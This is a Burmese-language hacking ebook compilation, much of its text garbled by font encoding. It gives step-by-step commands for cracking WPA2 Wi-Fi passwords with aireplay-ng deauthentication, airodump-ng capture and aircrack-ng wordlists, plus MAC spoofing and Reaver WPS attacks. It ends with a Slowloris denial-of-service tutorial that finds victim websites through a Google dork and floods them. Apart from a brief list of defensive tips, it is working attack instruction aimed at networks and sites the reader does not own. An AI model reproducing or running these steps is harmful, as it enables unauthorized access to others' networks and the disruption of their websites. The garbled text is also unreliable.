aireplay-ng -0 0 -a {BSSID နပါတးထညး} -c {Client Mac}ထညး mon0 ပရငး Enter ေခါကး။

ဒေနရာမြာမြတးထာဖ က {router mac}ေနရာမြာ မမ Target ရ BSSID နပါတးပါ။{Client Mac}ဆတာက

မမ Target ရ STATION ေအာကးက နပါတးဖစးပါတယး။ဒေလာကးဆရြငးပထငးပါတယး။မရြငးေသရငး

ပေတျကႀကညးပမမ Target ရ Data ေတျနအစာထသျာပါ။သပးမခကးပါဖခငးဗာ။ဒ Aireplay Command

ရကးအပမြာ Data ေတျ Send လပးေနတာကေတျရမြာပါ။ေဒတာပ တာမာလာတာနအမြ Target ဆက

စပေရာကးရြးသျာပ မနစးအနညးငယးအတျငးလငးကသျာေစမြာပါ။ပမြာ Sending လပးေနပပါ။

ပရငးေနာကးဆ Command ရကးပါေတာမယး။

aircrack-ng -w /root/desktop/1.1million wordlist.txt WPACap-01.cap ပါ။ကေနားတ က Desktop

ေပၚမြာ1.1 million wordlist.txt ကတငးခလ ဖငးတညးေနရာေပာငးသျာတာပါ။

ပမြာပထာပါတယး။ပမြာကေတာ wordlist file က /pentest ေအာကးမြာထာလ Pentest ေအာကး

လြမးေခၚရတသေဘာပါ။ WPAcap-01.cap ေနရာမြာ မမအရငးက ထာခတ File nameကထညးပါ။

မသရငး Terminal မြာ ls လရကးပႀကညးနငးပါတယး။ဥပမာ မမမြတးခတဖငးနမးက 3thic0kiddi3 ဆပါစ

3thic0kiddi3-01.cap လပနးလညးေခၚယရမြာဖစးပါတယး။

ဒ Aircrack ရကးအပမြာ မမ Wordlist နတကးဆငးစစးေဆပဖစးနငးေခ Password ေတျန

မမ Target ကးေဖါကးေနမြာဖစးပါတယး။Wordlist ကနးသျာတယးပကးဆကးမရေသဖဆရငး

darkc0de.lst နထပးရြာပါ။ဒါမြမရေသရငးအခာ Wordlist ေတျနဆကးရြာပါ။ဇျရြဖ ေတာလပါမညး။

ငးဖငးပငးရြငးေတားေတားမာမာကမမတကယးတငးမမြတးမမြာစလ ပကးဆကးေတျကလျယးလျယးေပထာ

တတးႀကတယး။ဒါမဆရငးေတာအမနးရမြာပါ။လတာရဖဆရငးေတာလျယးလျယးနလကးမေလာဖပါပ။

ႀကစာမြေအာငးမငးမြာပါ။ WPA2 Hacking ပပါပ။

WPA2 Cracking နညးလမး(ဿ)

WPA2 လငးက Crack လပးနငးတေနာကးနညးလမးတစးခပါ Mac Changer Method လေခၚပါတယး။

Mac က Change လပးပ Client ဘကးကေနေဖါကးတနညးလမးတစးခပါ။

နညးလမး နတတပါပ၊အနညးငယးကျာတာပါ။တမမရတမစမးႀကညးေပါေနား။

ပထမဆ Command က airmon-ng start wlan0 ဖစးပါတယး။

ပေနာကး ifconfig mon0 down လရကးပါ Enter ေခါကး

MAC ကကေနားတ ခနးပါမယး။ macchanger -m 00:11:22:33:44:55 mon0 လရကးပါ။

Fake Mac တစးခဖနးတလကးတာဖစးပါတယး။ကေနားတရ လကးရြ MaC ကတစးခခဆပါစ

ကေနားတ ကအခ 00:11:22:33:44:55 လေပာငးလပစးလကးတယး။

ပေတာ ifconfig mon0 up လ ရကးပါ။ပမြာႀကညးပါဥ။

ေနာကးတစးေႀကာငးကေတာ airodump-ng mon0 ပါ။ရြသမြလငးေတျပေပေနပါပ။

ကေနားစကးမြာေတာ WPA2 လငးေတျခညးပေနတယး။ကေနားက Victima ဆတလငးက Targetထာ

လကးပါပ။

မမ Target ရေဒတာကမြတးထာပါ။ရကးရမယး Command က

airodump-ng -c 6 --bssid 1C:7E:E5:32:1D:54 -w crack mon0

(မြတးခကး- Channel No.န BSSID No.ကေတာမမ Target အတငးေပာငးထညးပါရနး)

အဒကျနးမနးရကးအပမြာ မမ Target ရသသနး Data ကပ ပမြာပါ။

Terminal အသစးတစးခဖျငးပါ။

aireplay-ng -0 30 -a {မမတာဂတးရBSSID} -c {Client Macနပါတး} mon0 ကရကးပါ။

ပမြာႀကညးပနမနာယပါဥ။

အဒ Aireplay အပမြာ မမ Target ဆက Request ေတျ Sending လပးေနတာကေတျ ရမြာပါ။

တေဖေဖနပပါအတငး WPA Handshake လေပၚလာတအခါ Crack လပးလရနငးပါပ။

Terminal အသစးတစးခေခၚပါ။

aircrack-ng -w /root/Desktop/darkc0de.lst crack-01.cap ဆပ Enter နြပးပါ။

Darcode အပငး 1.1 million words list ကလသနငးပါတယး။ကေနားတက Word list ကDesktop

မြာထာထာလ root ေအာကးက Desktop လေခၚတာပါ။Crack-01.cap ေနရာမြာ မမေပခတအမညး

ကထညးပါ။၄ငး aircrack ရကးပလြငး Words List ေတျထက Password ေတျန Crack လပးေနတာမငး

ရပါမယး။ေနာကးဆမြာေတာပပါအတငး Key ကရရြလကးပါတယး။

Key Found=abril4de1969 ပါ။ဤသနနရြပးေထျ တာေတာငးခဏနတကးဆငးရြာေဖျရရြနငးပါတယး

Cracking Time ကသပးကမနးဆနးပါတယး။တခခကးခလျနးေသာပကးဆကးမာသာႀကာတတးပါ

တယး။

WPA2 Cracking နညးလမး(ဿ)ပပါပ။

WPA2 ပငးရြငးမာလခစတးခရဖ

WPA 2 ပငးရြငးမာအေနဖငး မမတ၏ Password မာက Default ထာသ၍ေသား၄ငး၊

Password အရြညးႀကစကာလရြပးရြပးေထျ ေထျ မာေပ၍ေသား၄ငး၊Mac address က

Filter လပး၍ေသား၄ငး၊မမ ငးဖငးလငးက နကး ကးမြ Hideလပးထာ၍ေသား၄ငး။ပကးဆကးေပရာ

တျငး မနးမာေဖါငးကသစာလမာသပါက Wordlist ထတျငးမပါေသာေႀကာငး လျယးလျယးနြငး

Hackလရမညးမဟတးပါ။ထ ပငးမမလငးေလလာလ ြငး restart ခလကးပါ။

MY Book Ref: Youtube(WEP,WPA2) Hacking,BT 5 wireless penetration testing book

You Tube တျငးဆကးလကးေလလာနငးမညး Video Training မာ ::::::….. :::….:: ….

http://www.youtube.com/watch?v=y9XV2MBPM5M

http://www.youtube.com/watch?v=FZso9pofw-0

http://www.youtube.com/watch?v=rzzgzP4hEo0

http://www.youtube.com/watch?v=T3iDWP2xeFw

http://www.youtube.com/watch?v=dB21RAvbcDQ

http://www.youtube.com/watch?v=aKQiAAzmW90&feature=fvsr

http://www.youtube.com/watch?v=BiJp9ZajJlg&feature=fvsr

အထကးပါ Video Link မာက Download ဆျပေလလာႀကညးပါ WEP,WPA2 မာက Crackလပးပ

တ Video မာဖစးပါတယး။

………………………………………………………………………………………………………………………………………

http://www.youtube.com/watch?v=y9XV2MBPM5M

http://www.youtube.com/watch?v=FZso9pofw-0

http://www.youtube.com/watch?v=rzzgzP4hEo0

http://www.youtube.com/watch?v=T3iDWP2xeFw

http://www.youtube.com/watch?v=dB21RAvbcDQ

http://www.youtube.com/watch?v=aKQiAAzmW90&feature=fvsr

http://www.youtube.com/watch?v=BiJp9ZajJlg&feature=fvsr

ကေနားေလလာမသေလာကးပနးလညး Share လပးေပသညးနညးပညာမာက နာမလညးပါက

[email protected] သတကးရကးဆကးသျယးနငးပါသညး။Hacking သညး Cyber Lawနြငးကငးလျတး

မြမရြပါ။ထေႀကာငးဆငးခငးတရာလကးကငးထာ၍စမးသပးႀကပါ။အမြာအယျငးမာပါ ငးပါကအႀကပစာမာ

စတးႀကကးေပပ နငးပါသညး။၄ငးအႀကပစာမာအရ 2nd Edition တျငးပနးလညးဖညးစျကးေဖၚပသျာပါမညး။

I like all Hackers from BHG,MHF,MHU,Planet Creator,MZ,MCT,Ghost Area

::::::::::Next books Coming Soon see you:::::…

စာဖတးသမာအာအစဥးေလစာလကး

3thic0kiddi3

[email protected]

mailto:[email protected]

wpa သ႕မဟတ wpa2/psk ဟကနညး

reaver-1.1 န႕ဟကမာပါ။

bt5 ကဖြငပါ။ terminal မာ

wget http://reaver-wps.googlecode.com/files/reaver-1.1.tar.gz

ျပးရငခနေဆာင

ျပးရင ဖငျဖညမယ tar zxvf reaver-1.1.tar.gz ျပးရင ls

ျပးရင cd reaver-1.1 ျပးရင ls ျပးရင cd src

ျပးရင ./configure ျပးရင make ျပးရင make install ေအာကပေတြကၾကညလကပါ။

လပငနးစမယဗာ

၁။ အရငဆး terminal ၁ခဖြငလကပါ ျပးရင airmon-ng

ရကထညလက ျပးရင airmon-ng start (interface) ရကလကပါ။

ျပးရင airodump-ng mon0

ျပးရင ကဟကခငတ ဟာကၾကညလကပါ။ BSSID CH ESSID အဒါေတြသဖ႕လတယ။

ကေနာဟကခငတာကေတာ BSSID 28:10:7B:8C:7C:22 CH က 3 ပါ ESSID က kira

အေက ဒါဆစျပေနာ terminal ၁ခဖြင reaver -i mon0 -b 28:10:7B:8C:7C:22

လပျပ ထားထားလကပါ။

ကပါစဝကကလာျပ။

Using slowloris script for DDos attack in backtrack 5 Posted by Aung Kyaw Moe

ကြနေတာတ Backtrack မာ slowloris script ကသးျပးေတာ Dos Attack လပပါမယ ………….ပထမဆး ေအာက txt file ကေဒါငးလကပါ…………:P

http://www.mediafire.com/?zdljotrlp1tclp1 ေနာက Desktop ေပါတငထားပါေနာ………..ပမာျပထားတအတငး terminal ထကေနဖငတစခေဆာကပါမယ…….ပထကအတငး command ေပးလကပါ…

ပထကအတငး Terminal ထမာ file တစခကတညေဆာကပါမယ nano command ကသးျပးေတာေပါ nano slowloris.pl လရကလကပါ ေအာကကပအတငး ထြကလာပါ လမမယ………..:P


http://www.youtube.com/redirect?q=http%3A%2F%2Fwww.mediafire.com%2F%3Fzdljotrlp1tclp1&session_token=nAHUpD9fsdiYTiRoyfAq1N4N0DB8MTM0MjMyODM4M0AxMzQyMjQxOTgz


ပမာျပထားတအတငးပေစာေစာကေဒါငးလဒလပထားတ .txt file ကဖြငလကပါေနာက Terminal မာေဆာကထားတ ဖငထက ပမာျပထားတအတငး ctrl+a ကနပျပး Termianl ထက ဆြထညလကပါ ပမာျပထားပါတယ ………………………


ေအာကကအတငး Terminal ထေရာကသြားပါလမမယ…………………..:P



Save လပပါမယ……………. ctrl+x ကနပလကပါ………..ေအာကကပအတငးေပါလာပါလမမယ

slowloris.pl ဆတနာမညန save မလားလေမးပါလမမယ Enter နပလကပါ…………Home Folder ေအာကကေရာကသြားပါလမမယ desktop ေပါေခါတငလကပါ……..:P


chmod 775 slowloris.pl လရကလကပါ………… အ chmod 775 ဆတာကနညးနညးရငးျပပါမယ chmod ဆတာ read , write ,execute for all ျဖစပါတယ ေနာက target site ကရာပါမယ Dork တစခကသးပါမယ လြယလြယကက inurl:php?id=1 လ Google မာရာလကပါ……………..:P


ကယျကကတဆဒတစခကေရြးလကပါ………….:P ေအာကကဆဒကကြနေတာေရြးလကပါတယ………..:D


perl ./slowloris.pl -dns http://www.target.com လရကလကပါ



သစတငအလပလပေနပါျပ ေအာကကပမာျကညပါ

က Terminal ကဖြငထားျပးေတာခဏကဖြငထားတဆဒက reload လပပါမယ ကသြားလားမကဘးလားသရေအာငပါ reload လပလကပါ……………………………


ကသြားပါျပ…အဓကေျပာခငတာကေတာ Terminal ကမပတလကဖပါပ………. Terminal ကပတလကရင DDos ကအဆးသတသြားမာျဖစပါတယ………………..။

ေကးဇးတငပါတယ ဆကလကျကးစားပါအးမယ……….:P


bt ebook ဇဴလဳိင္မင္းေဝ....@္(နည္းပညာ)

Design